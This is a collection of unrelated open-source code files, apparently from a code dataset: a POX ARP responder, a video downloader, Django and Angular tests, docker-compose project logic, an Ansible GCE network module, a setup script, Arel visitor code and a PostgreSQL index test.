self.mac = EthAddr(mac)
if static is not None:
self.static = static
if flood is not None:
self.flood = flood
def __eq__ (self, other):
if isinstance(other, Entry):
return (self.static,self.mac)==(other.static,other.mac)
else:
return self.mac == other
def __ne__ (self, other):
return not self.__eq__(other)
@property
def is_expired (self):
if self.static: return False
return time.time() > self.timeout
class ARPTable (dict):
def __repr__ (self):
o = []
for k,e in self.iteritems():
t = int(e.timeout - time.time())
if t < 0:
t = "X"
else:
t = str(t) + "s left"
if e.static: t = "-"
mac = e.mac
if mac is True: mac = "<Switch MAC>"
o.append((k,"%-17s %-20s %3s" % (k, mac, t)))
for k,t in _failed_queries.iteritems():
if k not in self:
t = int(time.time() - t)
o.append((k,"%-17s %-20s %3ss ago" % (k, '?', t)))
o.sort()
o = [e[1] for e in o]
o.insert(0,"-- ARP Table -----")
if len(o) == 1:
o.append("<< Empty >>")
return "\n".join(o)
def __setitem__ (self, key, val):
key = IPAddr(key)
if not isinstance(val, Entry):
val = Entry(val)
dict.__setitem__(self, key, val)
def __delitem__ (self, key):
key = IPAddr(key)
dict.__delitem__(self, key)
def set (self, key, value=True, static=True):
if not isinstance(value, Entry):
value = Entry(value, static=static)
self[key] = value
def _dpid_to_mac (dpid):
# Should maybe look at internal port MAC instead?
return EthAddr("%012x" % (dpid & 0xffFFffFFffFF,))
def _handle_expiration ():
for k,e in _arp_table.items():
if e.is_expired:
del _arp_table[k]
for k,t in _failed_queries.items():
if time.time() - t > ARP_TIMEOUT:
del _failed_queries[k]
class ARPResponder (object):
def __init__ (self):
# This timer handles expiring stuff
self._expire_timer = Timer(5, _handle_expiration, recurring=True)
core.addListeners(self)
def _handle_GoingUpEvent (self, event):
core.openflow.addListeners(self)
log.debug("Up...")
def _handle_ConnectionUp (self, event):
if _install_flow:
fm = of.ofp_flow_mod()
fm.priority = 0x7000 # Pretty high
fm.match.dl_type = ethernet.ARP_TYPE
fm.actions.append(of.ofp_action_output(port=of.OFPP_CONTROLLER))
event.connection.send(fm)
def _handle_PacketIn (self, event):
# Note: arp.hwsrc is not necessarily equal to ethernet.src
# (one such example are arp replies generated by this module itself
# as ethernet mac is set to switch dpid) so we should be careful
# to use only arp addresses in the learning code!
squelch = False
dpid = event.connection.dpid
inport = event.port
packet = event.parsed
if not packet.parsed:
log.warning("%s: ignoring unparsed packet", dpid_to_str(dpid))
return
a = packet.find('arp')
if not a: return
log.debug("%s ARP %s %s => %s", dpid_to_str(dpid),
{arp.REQUEST:"request",arp.REPLY:"reply"}.get(a.opcode,
'op:%i' % (a.opcode,)), str(a.protosrc), str(a.protodst))
if a.prototype == arp.PROTO_TYPE_IP:
if a.hwtype == arp.HW_TYPE_ETHERNET:
if a.protosrc != 0:
if _learn:
# Learn or update port/MAC info
if a.protosrc in _arp_table:
if _arp_table[a.protosrc] != a.hwsrc:
log.warn("%s RE-learned %s: %s->%s", dpid_to_str(dpid),
a.protosrc, _arp_table[a.protosrc].mac, a.hwsrc)
else:
log.info("%s learned %s", dpid_to_str(dpid), a.protosrc)
_arp_table[a.protosrc] = Entry(a.hwsrc)
if a.opcode == arp.REQUEST:
# Maybe we can answer
if a.protodst in _arp_table:
# We have an answer...
r = arp()
r.hwtype = a.hwtype
r.prototype = a.prototype
r.hwlen = a.hwlen
r.protolen = a.protolen
r.opcode = arp.REPLY
r.hwdst = a.hwsrc
r.protodst = a.protosrc
r.protosrc = a.protodst
mac = _arp_table[a.protodst].mac
if mac is True:
# Special case -- use ourself
mac = _dpid_to_mac(dpid)
r.hwsrc = mac
e = ethernet(type=packet.type, src=_dpid_to_mac(dpid),
dst=a.hwsrc)
e.payload = r
if packet.type == ethernet.VLAN_TYPE:
v_rcv = packet.find('vlan')
e.payload = vlan(eth_type = e.type,
payload = e.payload,
id = v_rcv.id,
pcp = v_rcv.pcp)
e.type = ethernet.VLAN_TYPE
log.info("%s answering ARP for %s" % (dpid_to_str(dpid),
str(r.protosrc)))
msg = of.ofp_packet_out()
msg.data = e.pack()
msg.actions.append(of.ofp_action_output(port =
of.OFPP_IN_PORT))
msg.in_port = inport
event.connection.send(msg)
return EventHalt if _eat_packets else None
else:
# Keep track of failed queries
squelch = a.protodst in _failed_queries
_failed_queries[a.protodst] = time.time()
if self._check_for_flood(dpid, a):
# Didn't know how to handle this ARP, so just flood it
msg = "%s flooding ARP %s %s => %s" % (dpid_to_str(dpid),
{arp.REQUEST:"request",arp.REPLY:"reply"}.get(a.opcode,
'op:%i' % (a.opcode,)), a.protosrc, a.protodst)
if squelch:
log.debug(msg)
else:
log.info(msg)
msg = of.ofp_packet_out()
msg.actions.append(of.ofp_action_output(port = of.OFPP_FLOOD))
msg.data = event.ofp
event.connection.send(msg.pack())
return EventHalt if _eat_packets else None
def _check_for_flood (self, dpid, a):
"""
Return True if you want to flood this
"""
if a.protodst in _arp_table:
return _arp_table[a.protodst].flood
return True
_arp_table = ARPTable() # IPAddr -> Entry
_install_flow = None
_eat_packets = None
_failed_queries = {} # IP -> time : queries we couldn't answer
_learn = None
def launch (timeout=ARP_TIMEOUT, no_flow=False, eat_packets=True,
no_learn=False, **kw):
global ARP_TIMEOUT, _install_flow, _eat_packets, _learn
ARP_TIMEOUT = timeout
_install_flow = not no_flow
_eat_packets = str_to_bool(eat_packets)
_learn = not no_learn
core.Interactive.variables['arp'] = _arp_table
for k,v in kw.iteritems():
_arp_table[IPAddr(k)] = Entry(v, static=True)
core.registerNew(ARPResponder) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
__all__ = ['veoh_download']
from ..common import *
import urllib.error
def veoh_download(url, output_dir = '.', merge = False, info_only = False, **kwargs):
'''Get item_id'''
if re.match(r'http://www.veoh.com/watch/\w+', url):
item_id = match1(url, r'http://www.veoh.com/watch/(\w+)')
elif re.match(r'http://www.veoh.com/m/watch.php\?v=\.*', url):
item_id = match1(url, r'http://www.veoh.com/m/watch.php\?v=(\w+)')
else:
raise NotImplementedError('Cannot find item ID')
veoh_download_by_id(item_id, output_dir = '.', merge = False, info_only = info_only, **kwargs)
#----------------------------------------------------------------------
def veoh_download_by_id(item_id, output_dir = '.', merge = False, info_only = False, **kwargs):
"""Source: Android mobile"""
webpage_url = 'http://www.veoh.com/m/watch.php?v={item_id}&quality=1'.format(item_id = item_id)
#grab download URL
a = get_content(webpage_url, decoded=True)
url = match1(a, r'<source src="(.*?)\"\W')
#grab title
title = match1(a, r'<meta property="og:title" content="([^"]*)"')
type_, ext, size = url_info(url)
print_info(site_info, title, type_, size)
if not info_only:
download_urls([url], title, ext, total_size=None, output_dir=output_dir, merge=merge)
site_info = "Veoh"
download = veoh_download
download_playlist = playlist_not_supported('veoh') | unknown | codeparrot/codeparrot-clean | ||
from __future__ import unicode_literals
import json
from django.contrib.gis.geos import LinearRing, Point, Polygon
from django.core import serializers
from django.test import TestCase, mock, skipUnlessDBFeature
from django.utils import six
from .models import City, MultiFields, PennsylvaniaCity
@skipUnlessDBFeature("gis_enabled")
class GeoJSONSerializerTests(TestCase):
fixtures = ['initial']
def test_builtin_serializers(self):
"""
'geojson' should be listed in available serializers.
"""
all_formats = set(serializers.get_serializer_formats())
public_formats = set(serializers.get_public_serializer_formats())
self.assertIn('geojson', all_formats),
self.assertIn('geojson', public_formats)
def test_serialization_base(self):
geojson = serializers.serialize('geojson', City.objects.all().order_by('name'))
try:
geodata = json.loads(geojson)
except Exception:
self.fail("Serialized output is not valid JSON")
self.assertEqual(len(geodata['features']), len(City.objects.all()))
self.assertEqual(geodata['features'][0]['geometry']['type'], 'Point')
self.assertEqual(geodata['features'][0]['properties']['name'], 'Chicago')
def test_geometry_field_option(self):
"""
When a model has several geometry fields, the 'geometry_field' option
can be used to specify the field to use as the 'geometry' key.
"""
MultiFields.objects.create(
city=City.objects.first(), name='Name', point=Point(5, 23),
poly=Polygon(LinearRing((0, 0), (0, 5), (5, 5), (5, 0), (0, 0))))
geojson = serializers.serialize('geojson', MultiFields.objects.all())
geodata = json.loads(geojson)
self.assertEqual(geodata['features'][0]['geometry']['type'], 'Point')
geojson = serializers.serialize('geojson', MultiFields.objects.all(),
geometry_field='poly')
geodata = json.loads(geojson)
self.assertEqual(geodata['features'][0]['geometry']['type'], 'Polygon')
def test_fields_option(self):
"""
The fields option allows to define a subset of fields to be present in
the 'properties' of the generated output.
"""
PennsylvaniaCity.objects.create(name='Mansfield', county='Tioga', point='POINT(-77.071445 41.823881)')
geojson = serializers.serialize('geojson', PennsylvaniaCity.objects.all(),
fields=('county', 'point'))
geodata = json.loads(geojson)
self.assertIn('county', geodata['features'][0]['properties'])
self.assertNotIn('founded', geodata['features'][0]['properties'])
def test_srid_option(self):
geojson = serializers.serialize('geojson', City.objects.all().order_by('name'), srid=2847)
geodata = json.loads(geojson)
self.assertEqual(
[int(c) for c in geodata['features'][0]['geometry']['coordinates']],
[1564802, 5613214])
@mock.patch('django.contrib.gis.serializers.geojson.HAS_GDAL', False)
def test_without_gdal(self):
# Without coordinate transformation, the serialization should succeed:
serializers.serialize('geojson', City.objects.all())
with six.assertRaisesRegex(self, serializers.base.SerializationError, '.*GDAL is not installed'):
# Coordinate transformations need GDAL
serializers.serialize('geojson', City.objects.all(), srid=2847)
def test_deserialization_exception(self):
"""
GeoJSON cannot be deserialized.
"""
with self.assertRaises(serializers.base.SerializerDoesNotExist):
serializers.deserialize('geojson', '{}') | unknown | codeparrot/codeparrot-clean | ||
/*!
* @license
* Copyright Google LLC All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.dev/license
*/
import {TestBed} from '@angular/core/testing';
import {AppComponent} from './app.component';
import {provideRouter, withComponentInputBinding} from '@angular/router';
import {routes} from './routing/routes';
import {Search, WINDOW} from '@angular/docs';
import {provideHttpClient} from '@angular/common/http';
import {provideHttpClientTesting} from '@angular/common/http/testing';
describe('AppComponent', () => {
const fakeSearch = {};
const fakeWindow = {location: {hostname: 'angular.dev'}};
it('should create the app', async () => {
await TestBed.configureTestingModule({
imports: [AppComponent],
providers: [
provideHttpClient(),
provideHttpClientTesting(),
provideRouter(routes, withComponentInputBinding()),
{
provide: WINDOW,
useValue: fakeWindow,
},
{
provide: Search,
useValue: fakeSearch,
},
],
}).compileComponents();
const fixture = TestBed.createComponent(AppComponent);
const app = fixture.componentInstance;
expect(app).toBeTruthy();
});
}); | typescript | github | https://github.com/angular/angular | adev/src/app/app.component.spec.ts |
from __future__ import unicode_literals
from __future__ import absolute_import
from functools import reduce
import logging
from docker.errors import APIError
from .config import get_service_name_from_net, ConfigurationError
from .const import DEFAULT_TIMEOUT, LABEL_PROJECT, LABEL_SERVICE, LABEL_ONE_OFF
from .container import Container
from .legacy import check_for_legacy_containers
from .service import Service
from .utils import parallel_execute
log = logging.getLogger(__name__)
def sort_service_dicts(services):
# Topological sort (Cormen/Tarjan algorithm).
unmarked = services[:]
temporary_marked = set()
sorted_services = []
def get_service_names(links):
return [link.split(':')[0] for link in links]
def get_service_dependents(service_dict, services):
name = service_dict['name']
return [
service for service in services
if (name in get_service_names(service.get('links', [])) or
name in service.get('volumes_from', []) or
name == get_service_name_from_net(service.get('net')))
]
def visit(n):
if n['name'] in temporary_marked:
if n['name'] in get_service_names(n.get('links', [])):
raise DependencyError('A service can not link to itself: %s' % n['name'])
if n['name'] in n.get('volumes_from', []):
raise DependencyError('A service can not mount itself as volume: %s' % n['name'])
else:
raise DependencyError('Circular import between %s' % ' and '.join(temporary_marked))
if n in unmarked:
temporary_marked.add(n['name'])
for m in get_service_dependents(n, services):
visit(m)
temporary_marked.remove(n['name'])
unmarked.remove(n)
sorted_services.insert(0, n)
while unmarked:
visit(unmarked[-1])
return sorted_services
class Project(object):
"""
A collection of services.
"""
def __init__(self, name, services, client):
self.name = name
self.services = services
self.client = client
def labels(self, one_off=False):
return [
'{0}={1}'.format(LABEL_PROJECT, self.name),
'{0}={1}'.format(LABEL_ONE_OFF, "True" if one_off else "False"),
]
@classmethod
def from_dicts(cls, name, service_dicts, client):
"""
Construct a ServiceCollection from a list of dicts representing services.
"""
project = cls(name, [], client)
for service_dict in sort_service_dicts(service_dicts):
links = project.get_links(service_dict)
volumes_from = project.get_volumes_from(service_dict)
net = project.get_net(service_dict)
project.services.append(Service(client=client, project=name, links=links, net=net,
volumes_from=volumes_from, **service_dict))
return project
@property
def service_names(self):
return [service.name for service in self.services]
def get_service(self, name):
"""
Retrieve a service by name. Raises NoSuchService
if the named service does not exist.
"""
for service in self.services:
if service.name == name:
return service
raise NoSuchService(name)
def validate_service_names(self, service_names):
"""
Validate that the given list of service names only contains valid
services. Raises NoSuchService if one of the names is invalid.
"""
valid_names = self.service_names
for name in service_names:
if name not in valid_names:
raise NoSuchService(name)
def get_services(self, service_names=None, include_deps=False):
"""
Returns a list of this project's services filtered
by the provided list of names, or all services if service_names is None
or [].
If include_deps is specified, returns a list including the dependencies for
service_names, in order of dependency.
Preserves the original order of self.services where possible,
reordering as needed to resolve dependencies.
Raises NoSuchService if any of the named services do not exist.
"""
if service_names is None or len(service_names) == 0:
return self.get_services(
service_names=self.service_names,
include_deps=include_deps
)
else:
unsorted = [self.get_service(name) for name in service_names]
services = [s for s in self.services if s in unsorted]
if include_deps:
services = reduce(self._inject_deps, services, [])
uniques = []
[uniques.append(s) for s in services if s not in uniques]
return uniques
def get_links(self, service_dict):
links = []
if 'links' in service_dict:
for link in service_dict.get('links', []):
if ':' in link:
service_name, link_name = link.split(':', 1)
else:
service_name, link_name = link, None
try:
links.append((self.get_service(service_name), link_name))
except NoSuchService:
raise ConfigurationError('Service "%s" has a link to service "%s" which does not exist.' % (service_dict['name'], service_name))
del service_dict['links']
return links
def get_volumes_from(self, service_dict):
volumes_from = []
if 'volumes_from' in service_dict:
for volume_name in service_dict.get('volumes_from', []):
try:
service = self.get_service(volume_name)
volumes_from.append(service)
except NoSuchService:
try:
container = Container.from_id(self.client, volume_name)
volumes_from.append(container)
except APIError:
raise ConfigurationError('Service "%s" mounts volumes from "%s", which is not the name of a service or container.' % (service_dict['name'], volume_name))
del service_dict['volumes_from']
return volumes_from
def get_net(self, service_dict):
if 'net' in service_dict:
net_name = get_service_name_from_net(service_dict.get('net'))
if net_name:
try:
net = self.get_service(net_name)
except NoSuchService:
try:
net = Container.from_id(self.client, net_name)
except APIError:
raise ConfigurationError('Service "%s" is trying to use the network of "%s", which is not the name of a service or container.' % (service_dict['name'], net_name))
else:
net = service_dict['net']
del service_dict['net']
else:
net = None
return net
def start(self, service_names=None, **options):
for service in self.get_services(service_names):
service.start(**options)
def stop(self, service_names=None, **options):
parallel_execute(
objects=self.containers(service_names),
obj_callable=lambda c: c.stop(**options),
msg_index=lambda c: c.name,
msg="Stopping"
)
def kill(self, service_names=None, **options):
parallel_execute(
objects=self.containers(service_names),
obj_callable=lambda c: c.kill(**options),
msg_index=lambda c: c.name,
msg="Killing"
)
def remove_stopped(self, service_names=None, **options):
all_containers = self.containers(service_names, stopped=True)
stopped_containers = [c for c in all_containers if not c.is_running]
parallel_execute(
objects=stopped_containers,
obj_callable=lambda c: c.remove(**options),
msg_index=lambda c: c.name,
msg="Removing"
)
def restart(self, service_names=None, **options):
for service in self.get_services(service_names):
service.restart(**options)
def build(self, service_names=None, no_cache=False):
for service in self.get_services(service_names):
if service.can_be_built():
service.build(no_cache)
else:
log.info('%s uses an image, skipping' % service.name)
def up(self,
service_names=None,
start_deps=True,
allow_recreate=True,
force_recreate=False,
do_build=True,
timeout=DEFAULT_TIMEOUT):
if force_recreate and not allow_recreate:
raise ValueError("force_recreate and allow_recreate are in conflict")
services = self.get_services(service_names, include_deps=start_deps)
for service in services:
service.remove_duplicate_containers()
plans = self._get_convergence_plans(
services,
allow_recreate=allow_recreate,
force_recreate=force_recreate,
)
return [
container
for service in services
for container in service.execute_convergence_plan(
plans[service.name],
do_build=do_build,
timeout=timeout
)
]
def _get_convergence_plans(self,
services,
allow_recreate=True,
force_recreate=False):
plans = {}
for service in services:
updated_dependencies = [
name
for name in service.get_dependency_names()
if name in plans
and plans[name].action == 'recreate'
]
if updated_dependencies and allow_recreate:
log.debug(
'%s has upstream changes (%s)',
service.name, ", ".join(updated_dependencies),
)
plan = service.convergence_plan(
allow_recreate=allow_recreate,
force_recreate=True,
)
else:
plan = service.convergence_plan(
allow_recreate=allow_recreate,
force_recreate=force_recreate,
)
plans[service.name] = plan
return plans
def pull(self, service_names=None):
for service in self.get_services(service_names, include_deps=True):
service.pull()
def containers(self, service_names=None, stopped=False, one_off=False):
if service_names:
self.validate_service_names(service_names)
else:
service_names = self.service_names
containers = [
Container.from_ps(self.client, container)
for container in self.client.containers(
all=stopped,
filters={'label': self.labels(one_off=one_off)})]
def matches_service_names(container):
return container.labels.get(LABEL_SERVICE) in service_names
if not containers:
check_for_legacy_containers(
self.client,
self.name,
self.service_names,
)
return filter(matches_service_names, containers)
def _inject_deps(self, acc, service):
dep_names = service.get_dependency_names()
if len(dep_names) > 0:
dep_services = self.get_services(
service_names=list(set(dep_names)),
include_deps=True
)
else:
dep_services = []
dep_services.append(service)
return acc + dep_services
class NoSuchService(Exception):
def __init__(self, name):
self.name = name
self.msg = "No such service: %s" % self.name
def __str__(self):
return self.msg
class DependencyError(ConfigurationError):
pass | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python
# Copyright 2013 Google Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: gce_net
version_added: "1.5"
short_description: create/destroy GCE networks and firewall rules
description:
- This module can create and destroy Google Compute Engine networks and
firewall rules U(https://developers.google.com/compute/docs/networking).
The I(name) parameter is reserved for referencing a network while the
I(fwname) parameter is used to reference firewall rules.
IPv4 Address ranges must be specified using the CIDR
U(http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing) format.
Full install/configuration instructions for the gce* modules can
be found in the comments of ansible/test/gce_tests.py.
options:
allowed:
description:
- the protocol:ports to allow ('tcp:80' or 'tcp:80,443' or 'tcp:80-800;udp:1-25')
required: false
default: null
aliases: []
ipv4_range:
description:
- the IPv4 address range in CIDR notation for the network
required: false
aliases: ['cidr']
fwname:
description:
- name of the firewall rule
required: false
default: null
aliases: ['fwrule']
name:
description:
- name of the network
required: false
default: null
aliases: []
src_range:
description:
- the source IPv4 address range in CIDR notation
required: false
default: null
aliases: ['src_cidr']
src_tags:
description:
- the source instance tags for creating a firewall rule
required: false
default: null
aliases: []
target_tags:
version_added: "1.9"
description:
- the target instance tags for creating a firewall rule
required: false
default: null
aliases: []
state:
description:
- desired state of the persistent disk
required: false
default: "present"
choices: ["active", "present", "absent", "deleted"]
aliases: []
service_account_email:
version_added: "1.6"
description:
- service account email
required: false
default: null
aliases: []
pem_file:
version_added: "1.6"
description:
- path to the pem file associated with the service account email
required: false
default: null
aliases: []
project_id:
version_added: "1.6"
description:
- your GCE project ID
required: false
default: null
aliases: []
requirements:
- "python >= 2.6"
- "apache-libcloud >= 0.13.3"
author: Eric Johnson <erjohnso@google.com>
'''
EXAMPLES = '''
# Simple example of creating a new network
- local_action:
module: gce_net
name: privatenet
ipv4_range: '10.240.16.0/24'
# Simple example of creating a new firewall rule
- local_action:
module: gce_net
name: privatenet
fwname: all-web-webproxy
allowed: tcp:80,8080
src_tags: ["web", "proxy"]
'''
try:
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
from libcloud.common.google import GoogleBaseError, QuotaExceededError, \
ResourceExistsError, ResourceNotFoundError
_ = Provider.GCE
HAS_LIBCLOUD = True
except ImportError:
HAS_LIBCLOUD = False
def format_allowed_section(allowed):
"""Format each section of the allowed list"""
if allowed.count(":") == 0:
protocol = allowed
ports = []
elif allowed.count(":") == 1:
protocol, ports = allowed.split(":")
else:
return []
if ports.count(","):
ports = ports.split(",")
else:
ports = [ports]
return_val = {"IPProtocol": protocol}
if ports:
return_val["ports"] = ports
return return_val
def format_allowed(allowed):
"""Format the 'allowed' value so that it is GCE compatible."""
return_value = []
if allowed.count(";") == 0:
return [format_allowed_section(allowed)]
else:
sections = allowed.split(";")
for section in sections:
return_value.append(format_allowed_section(section))
return return_value
def main():
module = AnsibleModule(
argument_spec = dict(
allowed = dict(),
ipv4_range = dict(),
fwname = dict(),
name = dict(),
src_range = dict(type='list'),
src_tags = dict(type='list'),
target_tags = dict(type='list'),
state = dict(default='present'),
service_account_email = dict(),
pem_file = dict(),
project_id = dict(),
)
)
if not HAS_LIBCLOUD:
module.exit_json(msg='libcloud with GCE support (0.13.3+) required for this module')
gce = gce_connect(module)
allowed = module.params.get('allowed')
ipv4_range = module.params.get('ipv4_range')
fwname = module.params.get('fwname')
name = module.params.get('name')
src_range = module.params.get('src_range')
src_tags = module.params.get('src_tags')
target_tags = module.params.get('target_tags')
state = module.params.get('state')
changed = False
json_output = {'state': state}
if state in ['active', 'present']:
network = None
try:
network = gce.ex_get_network(name)
json_output['name'] = name
json_output['ipv4_range'] = network.cidr
except ResourceNotFoundError:
pass
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
# user wants to create a new network that doesn't yet exist
if name and not network:
if not ipv4_range:
module.fail_json(msg="Missing required 'ipv4_range' parameter",
changed=False)
try:
network = gce.ex_create_network(name, ipv4_range)
json_output['name'] = name
json_output['ipv4_range'] = ipv4_range
changed = True
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
if fwname:
# user creating a firewall rule
if not allowed and not src_range and not src_tags:
if changed and network:
module.fail_json(
msg="Network created, but missing required " + \
"firewall rule parameter(s)", changed=True)
module.fail_json(
msg="Missing required firewall rule parameter(s)",
changed=False)
allowed_list = format_allowed(allowed)
try:
gce.ex_create_firewall(fwname, allowed_list, network=name,
source_ranges=src_range, source_tags=src_tags, target_tags=target_tags)
changed = True
except ResourceExistsError:
pass
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
json_output['fwname'] = fwname
json_output['allowed'] = allowed
json_output['src_range'] = src_range
json_output['src_tags'] = src_tags
json_output['target_tags'] = target_tags
if state in ['absent', 'deleted']:
if fwname:
json_output['fwname'] = fwname
fw = None
try:
fw = gce.ex_get_firewall(fwname)
except ResourceNotFoundError:
pass
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
if fw:
gce.ex_destroy_firewall(fw)
changed = True
if name:
json_output['name'] = name
network = None
try:
network = gce.ex_get_network(name)
# json_output['d1'] = 'found network name %s' % name
except ResourceNotFoundError:
# json_output['d2'] = 'not found network name %s' % name
pass
except Exception, e:
# json_output['d3'] = 'error with %s' % name
module.fail_json(msg=unexpected_error_msg(e), changed=False)
if network:
# json_output['d4'] = 'deleting %s' % name
gce.ex_destroy_network(network)
# json_output['d5'] = 'deleted %s' % name
changed = True
json_output['changed'] = changed
module.exit_json(**json_output)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.gce import *
if __name__ == '__main__':
main() | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/python
from distutils.core import setup, Extension
import glob
#from compiler.pycodegen import compileFile
#import distutils
#import distutils.sysconfig
#import distutils.core
import os
NAME='pyfann'
VERSION='2.0.0'
LONG_DESCRIPTION="""\
Fast Artificial Neural Network Library implements multilayer
artificial neural networks with support for both fully connected
and sparsely connected networks. It includes a framework for easy
handling of training data sets. It is easy to use, versatile, well
documented, and fast.
"""
#These lines are needed to circumvent a bug in distutils
swig_cmd = 'swig -c++ -python pyfann/pyfann.i'
print 'Running SWIG before:', swig_cmd
os.system(swig_cmd)
#This utility function searches for files
def hunt_files(root, which):
return glob.glob(os.path.join(root, which))
setup(
name=NAME,
description='Fast Artificial Neural Network Library (fann)',
long_description=LONG_DESCRIPTION,
version=VERSION,
author='Steffen Nissen',
author_email='lukesky@diku.dk',
maintainer='Gil Megidish & Vincenzo Di Massa',
maintainer_email='gil@megidish.net & hawk.it@tiscali,it',
url='http://sourceforge.net/projects/fann/',
license='GNU LESSER GENERAL PUBLIC LICENSE (LGPL)',
py_modules=['pyfann.libfann'],
ext_modules=[Extension('pyfann._libfann',['pyfann/pyfann_wrap.cxx'],
include_dirs=['../src/include'],
extra_objects=['../src/doublefann.o'],
define_macros=[("SWIG_COMPILE",None)]
),
]
) | unknown | codeparrot/codeparrot-clean | ||
# frozen_string_literal: true
require_relative "../helper"
module Arel
module Nodes
class OrTest < Arel::Spec
describe "#or" do
it "makes an OR node" do
attr = Table.new(:users)[:id]
left = attr.eq(10)
right = attr.eq(11)
node = left.or right
_(node.expr.left).must_equal left
_(node.expr.right).must_equal right
oror = node.or(right)
_(oror.expr.left).must_equal node
_(oror.expr.right).must_equal right
end
end
describe "equality" do
it "is equal with equal ivars" do
array = [Or.new(["foo", "bar"]), Or.new(["foo", "bar"])]
assert_equal 1, array.uniq.size
end
it "is not equal with different ivars" do
array = [Or.new(["foo", "bar"]), Or.new(["foo", "baz"])]
assert_equal 2, array.uniq.size
end
end
end
end
end | ruby | github | https://github.com/rails/rails | activerecord/test/cases/arel/nodes/or_test.rb |
-- int4 check
CREATE TABLE int4tmp (a int4);
\copy int4tmp from 'data/int2.data'
SET enable_seqscan=on;
SELECT count(*) FROM int4tmp WHERE a < 237;
SELECT count(*) FROM int4tmp WHERE a <= 237;
SELECT count(*) FROM int4tmp WHERE a = 237;
SELECT count(*) FROM int4tmp WHERE a >= 237;
SELECT count(*) FROM int4tmp WHERE a > 237;
SELECT a, a <-> '237' FROM int4tmp ORDER BY a <-> '237' LIMIT 3;
CREATE INDEX int4idx ON int4tmp USING gist ( a );
SET enable_seqscan=off;
SELECT count(*) FROM int4tmp WHERE a < 237::int4;
SELECT count(*) FROM int4tmp WHERE a <= 237::int4;
SELECT count(*) FROM int4tmp WHERE a = 237::int4;
SELECT count(*) FROM int4tmp WHERE a >= 237::int4;
SELECT count(*) FROM int4tmp WHERE a > 237::int4;
EXPLAIN (COSTS OFF)
SELECT a, a <-> '237' FROM int4tmp ORDER BY a <-> '237' LIMIT 3;
SELECT a, a <-> '237' FROM int4tmp ORDER BY a <-> '237' LIMIT 3; | sql | github | https://github.com/postgres/postgres | contrib/btree_gist/sql/int4.sql |
# frozen_string_literal: true
module Arel # :nodoc: all
module Visitors
class Dot < Arel::Visitors::Visitor
class Node # :nodoc:
attr_accessor :name, :id, :fields
def initialize(name, id, fields = [])
@name = name
@id = id
@fields = fields
end
end
class Edge < Struct.new :name, :from, :to # :nodoc:
end
def initialize
super()
@nodes = []
@edges = []
@node_stack = []
@edge_stack = []
@seen = {}
end
def accept(object, collector)
visit object
collector << to_dot
end
private
def visit_Arel_Nodes_Function(o)
visit_edge o, "expressions"
visit_edge o, "distinct"
end
def visit_Arel_Nodes_Unary(o)
visit_edge o, "expr"
end
def visit_Arel_Nodes_Binary(o)
visit_edge o, "left"
visit_edge o, "right"
end
def visit_Arel_Nodes_UnaryOperation(o)
visit_edge o, "operator"
visit_edge o, "expr"
end
def visit_Arel_Nodes_InfixOperation(o)
visit_edge o, "operator"
visit_edge o, "left"
visit_edge o, "right"
end
def visit__regexp(o)
visit_edge o, "left"
visit_edge o, "right"
visit_edge o, "case_sensitive"
end
alias :visit_Arel_Nodes_Regexp :visit__regexp
alias :visit_Arel_Nodes_NotRegexp :visit__regexp
def visit_Arel_Nodes_Ordering(o)
visit_edge o, "expr"
end
def visit_Arel_Nodes_TableAlias(o)
visit_edge o, "name"
visit_edge o, "relation"
end
def visit_Arel_Nodes_Count(o)
visit_edge o, "expressions"
visit_edge o, "distinct"
end
def visit_Arel_Nodes_ValuesList(o)
visit_edge o, "rows"
end
def visit_Arel_Nodes_StringJoin(o)
visit_edge o, "left"
end
def visit_Arel_Nodes_Window(o)
visit_edge o, "partitions"
visit_edge o, "orders"
visit_edge o, "framing"
end
def visit_Arel_Nodes_NamedWindow(o)
visit_edge o, "partitions"
visit_edge o, "orders"
visit_edge o, "framing"
visit_edge o, "name"
end
def visit__no_edges(o)
# intentionally left blank
end
alias :visit_Arel_Nodes_CurrentRow :visit__no_edges
alias :visit_Arel_Nodes_Distinct :visit__no_edges
def visit_Arel_Nodes_Extract(o)
visit_edge o, "expressions"
end
def visit_Arel_Nodes_NamedFunction(o)
visit_edge o, "name"
visit_edge o, "expressions"
visit_edge o, "distinct"
end
def visit_Arel_Nodes_InsertStatement(o)
visit_edge o, "relation"
visit_edge o, "columns"
visit_edge o, "values"
visit_edge o, "select"
end
def visit_Arel_Nodes_SelectCore(o)
visit_edge o, "source"
visit_edge o, "projections"
visit_edge o, "wheres"
visit_edge o, "windows"
visit_edge o, "groups"
visit_edge o, "comment"
visit_edge o, "havings"
visit_edge o, "set_quantifier"
visit_edge o, "optimizer_hints"
end
def visit_Arel_Nodes_SelectStatement(o)
visit_edge o, "cores"
visit_edge o, "limit"
visit_edge o, "orders"
visit_edge o, "offset"
visit_edge o, "lock"
visit_edge o, "with"
end
def visit_Arel_Nodes_UpdateStatement(o)
visit_edge o, "relation"
visit_edge o, "wheres"
visit_edge o, "values"
visit_edge o, "orders"
visit_edge o, "limit"
visit_edge o, "offset"
visit_edge o, "comment"
visit_edge o, "key"
end
def visit_Arel_Nodes_DeleteStatement(o)
visit_edge o, "relation"
visit_edge o, "wheres"
visit_edge o, "orders"
visit_edge o, "limit"
visit_edge o, "offset"
visit_edge o, "comment"
visit_edge o, "key"
end
def visit_Arel_Table(o)
visit_edge o, "name"
end
